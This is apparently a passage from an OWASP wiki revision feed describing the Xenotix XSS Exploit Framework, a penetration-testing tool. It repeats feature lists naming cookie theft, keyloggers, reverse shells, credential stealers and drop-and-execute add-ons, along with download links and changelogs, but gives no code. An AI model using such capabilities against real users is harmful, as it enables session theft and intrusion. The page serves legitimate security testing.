**HTA Network Configuration (Windows, IE)&lt;br /&gt;
**HTA Drive-By (Windows, IE)&lt;br /&gt;
**HTA Drive-By Reverse Shell (Windows, IE)&lt;br /&gt;
*Firefox Addons&lt;br /&gt;
**Reverse TCP Shell Addon (Windows, Persistent)&lt;br /&gt;
**Reverse TCP Shell Addon (Linux, Persistent)&lt;br /&gt;
**Session Stealer Addon (Persistent)&lt;br /&gt;
**Keylogger Addon (Persistent)&lt;br /&gt;
**DDoSer Addon (Persistent)&lt;br /&gt;
**Linux Credential File Stealer Addon (Persistent)&lt;br /&gt;
**Drop and Execute Addon (Persistent)&lt;br /&gt;
&lt;br /&gt;
'''AUXILIARY MODULES'''&lt;br /&gt;
*WebKit Developer Tools&lt;br /&gt;
*Encoder/Decoder&lt;br /&gt;
*JavaScript Encoders&lt;br /&gt;
**JSFuck 6 Char Encoder&lt;br /&gt;
**jjencode Encoder&lt;br /&gt;
**aaencode Encoder&lt;br /&gt;
*JavaScript Beautifier&lt;br /&gt;
*Hash Calculator&lt;br /&gt;
*Hash Detector&lt;br /&gt;
*View Injected JavaScript&lt;br /&gt;
*View XSS Payloads&lt;br /&gt;
&lt;br /&gt;
'''XENOTIX SCRIPTING ENGINE'''&lt;br /&gt;
* Xenotix API&lt;br /&gt;
* IronPython Scripting Support&lt;br /&gt;
* Trident and Gecko Web Engine Support&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Conference Talks =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' NULLCON GOA 2013 '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|J1phYXmLX8w}}&lt;br /&gt;
&lt;br /&gt;
''' CLUBHACK 2012 '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|NYZLP0q7-y4}}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Screenshots =&lt;br /&gt;
&lt;br /&gt;
{|&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
[[Image:POST_SCANNER.png|500px|thumb|right|Xenotix POST Request Scanner]] &lt;br /&gt;
|&lt;br /&gt;
[[Image:XENOTIX INFO.png|500px|thumb|left|Xenotix Information Gathering Modules]]&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
[[Image:XENOTIX EXPLOITATION.png|thumb|500px|right|Xenotix Exploitation Modules]]&lt;br /&gt;
|&lt;br /&gt;
[[Image:Scripting.png|thumb|500px|left|Xenotix Scripting Engine]]&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Downloads=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====IMPORTANT====&lt;br /&gt;
Antivirus Solutions may detect it as a threat. However it is due to the features in the exploitation framework.&lt;br /&gt;
&lt;br /&gt;
====Latest Release====&lt;br /&gt;
&lt;br /&gt;
[[Image:Dwd.png | 200px | link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.1.zip]]&lt;br /&gt;
* Mirror [https://drive.google.com/file/d/0B_Ci-1YbMqshNm5WRlRRTllqcG8/view Download V6.1 From GDrive]&lt;br /&gt;
MD5: 17c703f90dbb4f09b112284232bbb69f&lt;br /&gt;
&lt;br /&gt;
====Requirements====&lt;br /&gt;
* Microsoft .NET Framework 4.5 http://www.microsoft.com/en-in/download/details.aspx?id=30653&lt;br /&gt;
* IronPython 2.7.3 http://ironpython.codeplex.com/downloads/get/423690 [If you are using Scripting Engine]&lt;br /&gt;
====Older Versions====&lt;br /&gt;
*Version 6 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.zip | MD5: 54a2335e35c47b1e5a87b163088c63ff&lt;br /&gt;
*Version 5 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V5.rar | MD5: bdfce2d4af4012ecc20b86bed876a54a&lt;br /&gt;
*Version 4.5 http://opensecurity.in/downloads/Xenotix_XSS_Exploit_Framework_v4.5.rar&lt;br /&gt;
*Version 4 https://www.dropbox.com/s/ookdse6pyszh736/Xenotix%20XSS%20Exploit%20Framework%20V4.rar&lt;br /&gt;
*Version 3 https://www.owasp.org/index.php/File:OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip&lt;br /&gt;
*Version 2 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip&lt;br /&gt;
*Version 1 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploitation_Framework.zip&lt;br /&gt;
====Source====&lt;br /&gt;
* GitHub https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
= Documentation =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Check: https://www.youtube.com/playlist?list=PLX3EwmWe0cS80ls3TsNiukQD0hfZjLHnP&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Roadmap =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
''' WHAT'S NEW! '''&lt;br /&gt;
==V6.1 Changes==&lt;br /&gt;
* Bug Fixes&lt;br /&gt;
* Updated QuickPHP Server&lt;br /&gt;
* Local DOM XSS Analyzer&lt;br /&gt;
==V6 Changes==&lt;br /&gt;
{{#ev:youtube|RhGVuus_NJw}}&lt;br /&gt;
* Intelli Fuzzer&lt;br /&gt;
* Context Based Fuzzer&lt;br /&gt;
* Blind Fuzzer&lt;br /&gt;
* HTA Network Configuration&lt;br /&gt;
* HTA Drive-By&lt;br /&gt;
* HTA Drive-By Reverse Shell&lt;br /&gt;
* JSFuck 6 Char Encoder&lt;br /&gt;
* jjencode Encoder&lt;br /&gt;
* aaencode Encoder&lt;br /&gt;
* IP to Location&lt;br /&gt;
* IP to GeoLocation&lt;br /&gt;
* IP Hinting&lt;br /&gt;
* Download Spoofer&lt;br /&gt;
* HTML5 Geolocation API&lt;br /&gt;
* Reverse TCP Shell Addon (Linux)&lt;br /&gt;
* OAuth 1.0a Request Scanner&lt;br /&gt;
* 4800+ Payloads&lt;br /&gt;
* SSL Error Fixed&lt;br /&gt;
&lt;br /&gt;
==V5 Changes==&lt;br /&gt;
* Xenotix Scripting Engine&lt;br /&gt;
* Xenotix API&lt;br /&gt;
* V4.5 Bug Fixes&lt;br /&gt;
* GET Network IP (Information Gathering)&lt;br /&gt;
* QR Code Generator for Xenotix xook&lt;br /&gt;
* HTML5 WebCam Screenshot(Exploitation Module)&lt;br /&gt;
* HTML5 Get Page Screenshot (Exploitation Module)&lt;br /&gt;
* Find Feature in View Source.&lt;br /&gt;
* Improved Payload Count to 1630&lt;br /&gt;
* Name Changes&lt;br /&gt;
 &lt;br /&gt;
==V4.5 Changes==&lt;br /&gt;
&lt;br /&gt;
* JavaScript Beautifier&lt;br /&gt;
* Pause and Resume support for Scan&lt;br /&gt;
* Jump to Payload&lt;br /&gt;
* Cookie Support for POST Request&lt;br /&gt;
* Cookie Support and Custom Headers for Header Scanner &lt;br /&gt;
* Added TRACE method Support&lt;br /&gt;
* Improved Interface&lt;br /&gt;
* Better Proxy Support &lt;br /&gt;
* WAF Fingerprinting&lt;br /&gt;
* Load Files &amp;lt;exploitation module&amp;gt;&lt;br /&gt;
* Hash Calculator&lt;br /&gt;
* Hash Detector&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= XSS Cheat Sheet =&lt;br /&gt;
&lt;br /&gt;
[[Image:Xss_protection.png|center]]&lt;br /&gt;
&lt;br /&gt;
The Ultimate XSS Protection Cheat Sheet for Developers is a compilation of information available on XSS Protection from various organization, researchers, websites, and from our own experience.&lt;br /&gt;
This document follows a simple language and justifying explanations that helps a developer to implement the correct XSS defense and to build a secure web application that prevents XSS vulnerability and Post XSS attacks. It will also discuss about the existing methods or functions provided by various programming languages to mitigate XSS vulnerability. This document will be updated regularly in order to include updated and correct in information in the domain of XSS Protection.&lt;br /&gt;
&lt;br /&gt;
VIEW: [https://docs.google.com/viewer?srcid=0B_Ci-1YbMqshWUtlaGRyLVBVd28&amp;amp;amp;pid=explorer&amp;amp;amp;efh=false&amp;amp;amp;a=v&amp;amp;amp;chrome=false&amp;amp;amp;embedded=true THE ULTIMATE XSS PROTECTION CHEAT SHEET FOR DEVELOPERS]	&lt;br /&gt;
&lt;br /&gt;
= Goodies =		&lt;br /&gt;
== Xenotix Hoodies ==&lt;br /&gt;
[[Image:Xenotix_front.jpg]][[Image:Xenotix_back.jpg]]&lt;br /&gt;
&lt;br /&gt;
== Purchase ==&lt;br /&gt;
Buy Xenotix Hoodies from Paypal [http://opensecurity.in/xenotix-hoodies/ BUY NOW]&lt;br /&gt;
= Get Involved =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Involvement in the development of Xenotix is highly encouraged!&lt;br /&gt;
&lt;br /&gt;
Here are some of the ways you can help:&lt;br /&gt;
&lt;br /&gt;
==Support Us==&lt;br /&gt;
&lt;br /&gt;
*Twitter Page: [https://twitter.com/Xenotix Xenotix on Twitter]&lt;br /&gt;
*Facebook Page: [https://www.facebook.com/xenotix Xenotix on Facebook]&lt;br /&gt;
*Official Page: [[http://www.opensecurity.in/owasp-xenotix-xss-exploit-framework-v4-2013  Xenotix @ OpenSecurity]]&lt;br /&gt;
&lt;br /&gt;
==Feedback &amp;amp; Queries==&lt;br /&gt;
&lt;br /&gt;
* Do you have any issues with it?&lt;br /&gt;
* Do you find any design flows or errors?&lt;br /&gt;
* Do you need help in using it?&lt;br /&gt;
* Do you have something to tell about it?&lt;br /&gt;
&lt;br /&gt;
Then please use this form: https://docs.google.com/forms/d/1RpUhQvuHGvPTl7Gi-EXzecidGvJwKpsRaY9-MeXm1ro/viewform&lt;br /&gt;
&lt;br /&gt;
==Development==&lt;br /&gt;
&lt;br /&gt;
Are you a developer? Do you have some cool ideas to contribute? Get in touch via '''ajin [DOT] abraham [AT] owasp.org''' &lt;br /&gt;
If you actively contribute to Xenotix then you will be invited to join the project. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP Project]]  [[Category:OWASP_Breakers]] [[Category:OWASP_Defenders]]&lt;br /&gt;
[[Category:OWASP_Project|Xenotix XSS Exploit Framework Project]] [[Category:OWASP_Tool]] [[Category:OWASP_Release_Quality_Tool|OWASP Release Quality Tool]] [[Category:OWASP_Download]]&lt;/div&gt;</summary>
		<author><name>Ajin Abraham</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=File:Xenotix_back.jpg&amp;diff=187781</id>
		<title>File:Xenotix back.jpg</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=File:Xenotix_back.jpg&amp;diff=187781"/>
				<updated>2015-01-10T04:59:45Z</updated>
		
		<summary type="html">&lt;p&gt;Ajin Abraham: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Ajin Abraham</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=File:Xenotix_front.jpg&amp;diff=187780</id>
		<title>File:Xenotix front.jpg</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=File:Xenotix_front.jpg&amp;diff=187780"/>
				<updated>2015-01-10T04:59:28Z</updated>
		
		<summary type="html">&lt;p&gt;Ajin Abraham: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Ajin Abraham</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Xenotix_XSS_Exploit_Framework&amp;diff=186635</id>
		<title>OWASP Xenotix XSS Exploit Framework</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Xenotix_XSS_Exploit_Framework&amp;diff=186635"/>
				<updated>2014-12-08T12:03:31Z</updated>
		
		<summary type="html">&lt;p&gt;Ajin Abraham: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:20px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
==OWASP Xenotix XSS Exploit Framework==&lt;br /&gt;
&lt;br /&gt;
[[Image:Xen6.png|left|550px]]&lt;br /&gt;
'''OWASP Xenotix XSS Exploit Framework''' is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. Xenotix provides Zero False Positive XSS Detection by performing the Scan within the browser engines where in real world, payloads get reflected. Xenotix Scanner Module is incorporated with 3 intelligent fuzzers to reduce the scan time and produce better results. If you really don't like the tool logic, then leverage the power of Xenotix API to make the tool work like you wanted it to be.&lt;br /&gt;
It is claimed to have the world’s 2nd largest XSS Payloads of about 4800+ distinctive XSS Payloads. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes real world offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation. Say no to alert pop-ups in PoC. Pen testers can now create appealing Proof of Concepts within few clicks.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;paypal&amp;gt;OWASP Xenotix XSS Exploit Framework&amp;lt;/paypal&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== LICENSING ==&lt;br /&gt;
OWASP Xenotix XSS Exploit Framework is free to use. It is licensed under the http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, and you can adapt it, and use it commercially, but all provided that you attribute the work and if you alter, transform, or build upon this work, you may distribute the resulting work only under the same or similar license to this one.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:175px;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== PRESENTATIONS ==&lt;br /&gt;
&lt;br /&gt;
'''DEFCON DCG Banglore 2013'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/pwning-with-xss-from-alert-to-reverse-shell-defcon-banglore-2013 OWASP Xenotix XSS Exploit Framework v4 ]&lt;br /&gt;
&lt;br /&gt;
'''BlackHat Europe Arsenal 2013'''&lt;br /&gt;
*Presentation: [https://www.dropbox.com/s/o8adyvtngbszq32/blackhat.zip OWASP Xenotix XSS Exploit Framework v3 ]&lt;br /&gt;
&lt;br /&gt;
'''Nulcon Goa 2013'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/owasp-xenotix-xss-exploit-framework-v3-nullcon-goa-2013 OWASP Xenotix XSS Exploit Framework v3 ]&lt;br /&gt;
'''ClubHack 2012'''&lt;br /&gt;
*Presentation: [http://www.slideshare.net/ajin25/xenotix-xss-exploit-framework-clubhack-2012 OWASP Xenotix XSS Exploit Framework v2]&lt;br /&gt;
&lt;br /&gt;
== PROJECT LEADER ==&lt;br /&gt;
&lt;br /&gt;
Ajin Abraham | [https://twitter.com/ajinabraham @ajinabraham]&lt;br /&gt;
&lt;br /&gt;
== PROJECT WEBSITE ==&lt;br /&gt;
&lt;br /&gt;
*http://xenotix.in&lt;br /&gt;
&lt;br /&gt;
== AWARDS ==&lt;br /&gt;
&lt;br /&gt;
[[Image:ToolsWatch.png‎ |180px | thumb | left |link=http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ | Top 5th Security Tool of 2013]]&lt;br /&gt;
[[Image:CSPF.jpg |180px | thumb | left | Recommended by CSPF]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:175px;&amp;quot; | &lt;br /&gt;
&lt;br /&gt;
== QUICK DOWNLOAD ==&lt;br /&gt;
&lt;br /&gt;
[[Image:Dwd.png |200px| link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.1.zip]]&lt;br /&gt;
&lt;br /&gt;
== NEWS AND EVENTS ==&lt;br /&gt;
* [08 Dec 2014] Xenotix XSS Exploit Framework V6.1 is Released&lt;br /&gt;
* [14 Sept 2014] Xenotix XSS Exploit Framework V6 is Released&lt;br /&gt;
* [14 Feb 2014] Xenotix XSS Exploit Framework V5 is Released&lt;br /&gt;
* [16 Dec 2013] [http://www.toolswatch.org/2013/12/2013-top-security-tools-as-voted-by-toolswatch-org-readers/ Top 5th Security tool of 2013, voted by ToolsWatch Readers]&lt;br /&gt;
* [10 Nov 2013] [http://holisticinfosec.org/toolsmith/pdf/november2013.pdf OWASP Xenotix in ISSA Journal]&lt;br /&gt;
* [01 Nov 2013] [http://holisticinfosec.blogspot.in/2013/11/toolsmith-owasp-xenotix-xss-exploit.html Toolsmith Tool of the Month]&lt;br /&gt;
&lt;br /&gt;
== RELATED PROJECTS ==&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Xelenium_Project]]&lt;br /&gt;
* [[ZAP]]&lt;br /&gt;
* [[OWASP_XSSER]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== CLASSIFICATIONS ==&lt;br /&gt;
&lt;br /&gt;
   {| width=&amp;quot;200&amp;quot; cellpadding=&amp;quot;2&amp;quot;&lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot; rowspan=&amp;quot;2&amp;quot;| [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-builders-small.png|link=]]  &lt;br /&gt;
   |-&lt;br /&gt;
   | align=&amp;quot;center&amp;quot; valign=&amp;quot;top&amp;quot; width=&amp;quot;50%&amp;quot;| [[File:Owasp-breakers-small.png|link=]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]&lt;br /&gt;
   |-&lt;br /&gt;
   | colspan=&amp;quot;2&amp;quot; align=&amp;quot;center&amp;quot;  | [[File:Project_Type_Files_CODE.jpg|link=]]&lt;br /&gt;
   |}&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Features =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''SCANNER MODULES'''&lt;br /&gt;
&lt;br /&gt;
*GET Request Fuzzer&lt;br /&gt;
*POST Request Fuzzer&lt;br /&gt;
*Advanced Request Fuzzer&lt;br /&gt;
*OAuth 1.0a Request Scanner&lt;br /&gt;
*DOM Scanner&lt;br /&gt;
**DOM XSS Analyzer&lt;br /&gt;
**Local DOM XSS Analyzer&lt;br /&gt;
*Hidden Parameter Detector&lt;br /&gt;
&lt;br /&gt;
'''INFORMATION GATHERING MODULES'''&lt;br /&gt;
&lt;br /&gt;
*WAF Fingerprinting&lt;br /&gt;
*Victim Fingerprinting&lt;br /&gt;
**IP to Location&lt;br /&gt;
**IP to GeoLocation&lt;br /&gt;
*Network&lt;br /&gt;
**Network IP (WebRTC)&lt;br /&gt;
**Ping Scan&lt;br /&gt;
**Port Scan&lt;br /&gt;
**Internal Network Scan&lt;br /&gt;
*Browser&lt;br /&gt;
**Fingerprinting&lt;br /&gt;
**Features Detector&lt;br /&gt;
&lt;br /&gt;
'''EXPLOITATION MODULES'''&lt;br /&gt;
&lt;br /&gt;
*Send Message&lt;br /&gt;
*Cookie Thief&lt;br /&gt;
*Keylogger&lt;br /&gt;
*HTML5 DDoSer&lt;br /&gt;
*Load File&lt;br /&gt;
*Grab Page Screenshot&lt;br /&gt;
*JavaScript Shell&lt;br /&gt;
*Reverse HTTP WebShell&lt;br /&gt;
*Metasploit Browser Exploit&lt;br /&gt;
*Social Engineering&lt;br /&gt;
**Phisher&lt;br /&gt;
**Tabnabbing&lt;br /&gt;
**Live WebCam Screenshot&lt;br /&gt;
**Download Spoofer&lt;br /&gt;
**Geolocation HTML5 API&lt;br /&gt;
**Java Applet Drive-By (Windows)&lt;br /&gt;
**Java Applet Drive-By Reverse Shell (Windows)&lt;br /&gt;
**HTA Network Configuration (Windows, IE)&lt;br /&gt;
**HTA Drive-By (Windows, IE)&lt;br /&gt;
**HTA Drive-By Reverse Shell (Windows, IE)&lt;br /&gt;
*Firefox Addons&lt;br /&gt;
**Reverse TCP Shell Addon (Windows, Persistent)&lt;br /&gt;
**Reverse TCP Shell Addon (Linux, Persistent)&lt;br /&gt;
**Session Stealer Addon (Persistent)&lt;br /&gt;
**Keylogger Addon (Persistent)&lt;br /&gt;
**DDoSer Addon (Persistent)&lt;br /&gt;
**Linux Credential File Stealer Addon (Persistent)&lt;br /&gt;
**Drop and Execute Addon (Persistent)&lt;br /&gt;
&lt;br /&gt;
'''AUXILIARY MODULES'''&lt;br /&gt;
*WebKit Developer Tools&lt;br /&gt;
*Encoder/Decoder&lt;br /&gt;
*JavaScript Encoders&lt;br /&gt;
**JSFuck 6 Char Encoder&lt;br /&gt;
**jjencode Encoder&lt;br /&gt;
**aaencode Encoder&lt;br /&gt;
*JavaScript Beautifier&lt;br /&gt;
*Hash Calculator&lt;br /&gt;
*Hash Detector&lt;br /&gt;
*View Injected JavaScript&lt;br /&gt;
*View XSS Payloads&lt;br /&gt;
&lt;br /&gt;
'''XENOTIX SCRIPTING ENGINE'''&lt;br /&gt;
* Xenotix API&lt;br /&gt;
* IronPython Scripting Support&lt;br /&gt;
* Trident and Gecko Web Engine Support&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Conference Talks =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' NULLCON GOA 2013 '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|J1phYXmLX8w}}&lt;br /&gt;
&lt;br /&gt;
''' CLUBHACK 2012 '''&lt;br /&gt;
&lt;br /&gt;
{{#ev:youtube|NYZLP0q7-y4}}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Screenshots =&lt;br /&gt;
&lt;br /&gt;
{|&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
[[Image:POST_SCANNER.png|500px|thumb|right|Xenotix POST Request Scanner]] &lt;br /&gt;
|&lt;br /&gt;
[[Image:XENOTIX INFO.png|500px|thumb|left|Xenotix Information Gathering Modules]]&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
[[Image:XENOTIX EXPLOITATION.png|thumb|500px|right|Xenotix Exploitation Modules]]&lt;br /&gt;
|&lt;br /&gt;
[[Image:Scripting.png|thumb|500px|left|Xenotix Scripting Engine]]&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=Downloads=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
====IMPORTANT====&lt;br /&gt;
Antivirus Solutions may detect it as a threat. However it is due to the features in the exploitation framework.&lt;br /&gt;
&lt;br /&gt;
====Latest Release====&lt;br /&gt;
&lt;br /&gt;
[[Image:Dwd.png | 200px | link=http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.1.zip]]&lt;br /&gt;
* Mirror [https://drive.google.com/file/d/0B_Ci-1YbMqshNm5WRlRRTllqcG8/view Download V6.1 From GDrive]&lt;br /&gt;
MD5: 17c703f90dbb4f09b112284232bbb69f&lt;br /&gt;
&lt;br /&gt;
====Requirements====&lt;br /&gt;
* Microsoft .NET Framework 4.5 http://www.microsoft.com/en-in/download/details.aspx?id=30653&lt;br /&gt;
* IronPython 2.7.3 http://ironpython.codeplex.com/downloads/get/423690 [If you are using Scripting Engine]&lt;br /&gt;
====Older Versions====&lt;br /&gt;
*Version 6 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V6.zip | MD5: 54a2335e35c47b1e5a87b163088c63ff&lt;br /&gt;
*Version 5 http://opensecurity.in/downloads/OWASP_Xenotix_XSS_Exploit_Framework_V5.rar | MD5: bdfce2d4af4012ecc20b86bed876a54a&lt;br /&gt;
*Version 4.5 http://opensecurity.in/downloads/Xenotix_XSS_Exploit_Framework_v4.5.rar&lt;br /&gt;
*Version 4 https://www.dropbox.com/s/ookdse6pyszh736/Xenotix%20XSS%20Exploit%20Framework%20V4.rar&lt;br /&gt;
*Version 3 https://www.owasp.org/index.php/File:OWASP_Xenotix_XSS_Exploit_Framework_v3_2013.zip&lt;br /&gt;
*Version 2 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploit_Framework_2013_v2.zip&lt;br /&gt;
*Version 1 https://www.owasp.org/index.php/File:Xenotix_XSS_Exploitation_Framework.zip&lt;br /&gt;
====Source====&lt;br /&gt;
* GitHub https://github.com/ajinabraham/OWASP-Xenotix-XSS-Exploit-Framework/&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
= Documentation =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Check: https://www.youtube.com/playlist?list=PLX3EwmWe0cS80ls3TsNiukQD0hfZjLHnP&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= Roadmap =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;font-size:120%;border:none;margin: 0;color:#000&amp;quot;&amp;gt;&lt;br /&gt;
''' WHAT'S NEW! '''&lt;br /&gt;
==V6.1 Changes==&lt;br /&gt;
* Bug Fixes&lt;br /&gt;
* Updated QuickPHP Server&lt;br /&gt;
* Local DOM XSS Analyzer&lt;br /&gt;
==V6 Changes==&lt;br /&gt;
{{#ev:youtube|RhGVuus_NJw}}&lt;br /&gt;
* Intelli Fuzzer&lt;br /&gt;
* Context Based Fuzzer&lt;br /&gt;
* Blind Fuzzer&lt;br /&gt;
* HTA Network Configuration&lt;br /&gt;
* HTA Drive-By&lt;br /&gt;
* HTA Drive-By Reverse Shell&lt;br /&gt;
* JSFuck 6 Char Encoder&lt;br /&gt;
* jjencode Encoder&lt;br /&gt;
* aaencode Encoder&lt;br /&gt;
* IP to Location&lt;br /&gt;
* IP to GeoLocation&lt;br /&gt;
* IP Hinting&lt;br /&gt;
* Download Spoofer&lt;br /&gt;
* HTML5 Geolocation API&lt;br /&gt;
* Reverse TCP Shell Addon (Linux)&lt;br /&gt;
* OAuth 1.0a Request Scanner&lt;br /&gt;
* 4800+ Payloads&lt;br /&gt;
* SSL Error Fixed&lt;br /&gt;
&lt;br /&gt;
==V5 Changes==&lt;br /&gt;
* Xenotix Scripting Engine&lt;br /&gt;
* Xenotix API&lt;br /&gt;
* V4.5 Bug Fixes&lt;br /&gt;
* GET Network IP (Information Gathering)&lt;br /&gt;
* QR Code Generator for Xenotix xook&lt;br /&gt;
* HTML5 WebCam Screenshot(Exploitation Module)&lt;br /&gt;
* HTML5 Get Page Screenshot (Exploitation Module)&lt;br /&gt;
* Find Feature in View Source.&lt;br /&gt;
* Improved Payload Count to 1630&lt;br /&gt;
* Name Changes&lt;br /&gt;
 &lt;br /&gt;
==V4.5 Changes==&lt;br /&gt;
&lt;br /&gt;
* JavaScript Beautifier&lt;br /&gt;
* Pause and Resume support for Scan&lt;br /&gt;
* Jump to Payload&lt;br /&gt;
* Cookie Support for POST Request&lt;br /&gt;
* Cookie Support and Custom Headers for Header Scanner &lt;br /&gt;
* Added TRACE method Support&lt;br /&gt;
* Improved Interface&lt;br /&gt;
* Better Proxy Support &lt;br /&gt;
* WAF Fingerprinting&lt;br /&gt;
* Load Files &amp;lt;exploitation module&amp;gt;&lt;br /&gt;
* Hash Calculator&lt;br /&gt;
* Hash Detector&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= XSS Protection Cheat Sheet =&lt;br /&gt;
&lt;br /&gt;
